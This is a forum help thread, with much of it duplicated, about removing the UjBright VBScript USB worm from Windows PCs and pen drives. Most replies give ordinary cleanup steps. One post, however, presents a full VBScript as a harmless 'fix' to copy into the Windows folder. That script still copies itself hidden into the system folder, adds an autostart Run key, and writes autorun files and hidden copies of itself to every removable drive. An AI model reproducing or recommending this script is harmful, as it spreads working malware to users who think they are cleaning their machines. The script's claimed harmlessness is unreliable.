Cannot find c:\windows\ujbright_antivirus.vbs
Solved/Closed3 responses
The file was deleted by your antivirus.
So, go to cmd prompt, and type the following. If H: is the pendrive, then
H:\> del /F /a autorun.inf
Then go to run and type msconfig
Navigate to the start-up folder and uncheck the entry for UjBright.. (If the virus is still there)
Now go to task-manager (alt-ctrl-del) and kill the process called wscript.exe (If the virus is still there)
Now take the following two lines of code and save them as anything.vbs
____________________________________________________________
Set Shell = CreateObject( "WScript.Shell" )
Shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
____________________________________________________________
Now take the following lines of code and save as something.reg
____________________________________________________________
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"NoDrives"=dword:00000000
"NoViewOnDrive"=dword:00000000
"NofolderOptions"=dword:00000000
____________________________________________________________
Also, check out stupidviruses.blogspot.com/
So, go to cmd prompt, and type the following. If H: is the pendrive, then
H:\> del /F /a autorun.inf
Then go to run and type msconfig
Navigate to the start-up folder and uncheck the entry for UjBright.. (If the virus is still there)
Now go to task-manager (alt-ctrl-del) and kill the process called wscript.exe (If the virus is still there)
Now take the following two lines of code and save them as anything.vbs
____________________________________________________________
Set Shell = CreateObject( "WScript.Shell" )
Shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
____________________________________________________________
Now take the following lines of code and save as something.reg
____________________________________________________________
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"NoDrives"=dword:00000000
"NoViewOnDrive"=dword:00000000
"NofolderOptions"=dword:00000000
____________________________________________________________
Also, check out stupidviruses.blogspot.com/
The file UjBright_Antivirus.vbs infects the systems and changes Explorer>Menu>Tools>Folder options> and changes the file attributes to NOT show hidden files, It also disables registry editing, so that we cannot disable the virus from being active.
I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and I added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
===================
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
wscr.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
If ax = false Then wscr.Run "wscript.exe """ & win &
"\UjBright_Antivirus_vbs.txt"""
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Then
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
auFile.close
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
UJBRIGHT"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
WScript.Quit
Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and I added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
===================
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
wscr.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
If ax = false Then wscr.Run "wscript.exe """ & win &
"\UjBright_Antivirus_vbs.txt"""
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Then
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
auFile.close
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
UJBRIGHT"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
WScript.Quit
Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This ujbright_antivirus.vbs is a variant of virus like the sowar.vbs, the script was edited by oxymoron from COTABATO CITY practicing to became a "kiddie-computer-wizard" . this asshole can be remove manually... Power on ur computer to safemode, using windows explorer, goto c:\windows then rename wscript.exe to wscriptures.exe , run regedit, delete the entry "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autome". exit... restart ur computer... if you are using usb flash drive, maybe it is contaminated by ujBright, use TURBONAV to view files in your usb flashdrive then delete these files: ujbright_antivirus.vbs, autorun.inf, readme.txt...(coz these file's attribute is hidden, read-only, and as system files.) do not use windows explorer, you can't see these files.
dear friend, my system got infected with ujbirght_antivirus.vbs, autorun.inf and readme.txt file. I deleted it from my system using attrib command and formated that drive. Now my pendrive got infected with this file. I tried to remove it in the same way using attrib command, formating but it did not work.Whenever I try to remove it safely it gives a msg "the generic disk cannot be stopped.tryto remove it later".when I try to format it it gives a msgsome disk utilities is running so it cannot be formatted. pls help me I am stuck withit.even using avg with update has not worked. I tried to format in other systembut in vain.it would be better if u mail me.
Hi Deepak,
Even I had the same problem
as far the deletion of the virus from your pendrive is concerned you need to format it altogether and then Boot to safe mode. Choose the system administrator which is shown only in safe mode. This will allow you to delete the the UJBright_anitvirus.vbs file from C:\windows\ . Then open the registry editor and navogate to HKey\Local_machine\Software\Microsoft\Windows\Current Version\Run and delete the dword value autome.
In case you are no unable to find the system administrator account then it is directly reformat the system after reformatting your pendrive.
Even this does not work out then download a linux based OS probably Ubuntu 8.04 or higher. Boot using the live CD and navigate to the windows partion no your computer and remove the script and also from your pen drive. Reason is that when we boot from the linux all attributes of windows are disabled and .exe or .vbs files cannot be executed.
Regards
Sid
Even I had the same problem
as far the deletion of the virus from your pendrive is concerned you need to format it altogether and then Boot to safe mode. Choose the system administrator which is shown only in safe mode. This will allow you to delete the the UJBright_anitvirus.vbs file from C:\windows\ . Then open the registry editor and navogate to HKey\Local_machine\Software\Microsoft\Windows\Current Version\Run and delete the dword value autome.
In case you are no unable to find the system administrator account then it is directly reformat the system after reformatting your pendrive.
Even this does not work out then download a linux based OS probably Ubuntu 8.04 or higher. Boot using the live CD and navigate to the windows partion no your computer and remove the script and also from your pen drive. Reason is that when we boot from the linux all attributes of windows are disabled and .exe or .vbs files cannot be executed.
Regards
Sid
Clcik on Start - click on run - type regedit -click on enter
This open the registry editor
click on the plus mark next to HKEY_LOCAL_MACHINE
SOFTWARE
Microsoft
Windows
CurrentVersion
Run
on the right hand side you will find the file auotme
right lick and delete it
restart ur computer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autome". exit... restart ur computer
This open the registry editor
click on the plus mark next to HKEY_LOCAL_MACHINE
SOFTWARE
Microsoft
Windows
CurrentVersion
Run
on the right hand side you will find the file auotme
right lick and delete it
restart ur computer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autome". exit... restart ur computer
Oct 17, 2009 at 11:14 PM
Oct 18, 2009 at 10:02 PM
Oct 23, 2009 at 07:32 PM
Apr 10, 2010 at 11:07 AM
Jun 22, 2013 at 02:56 PM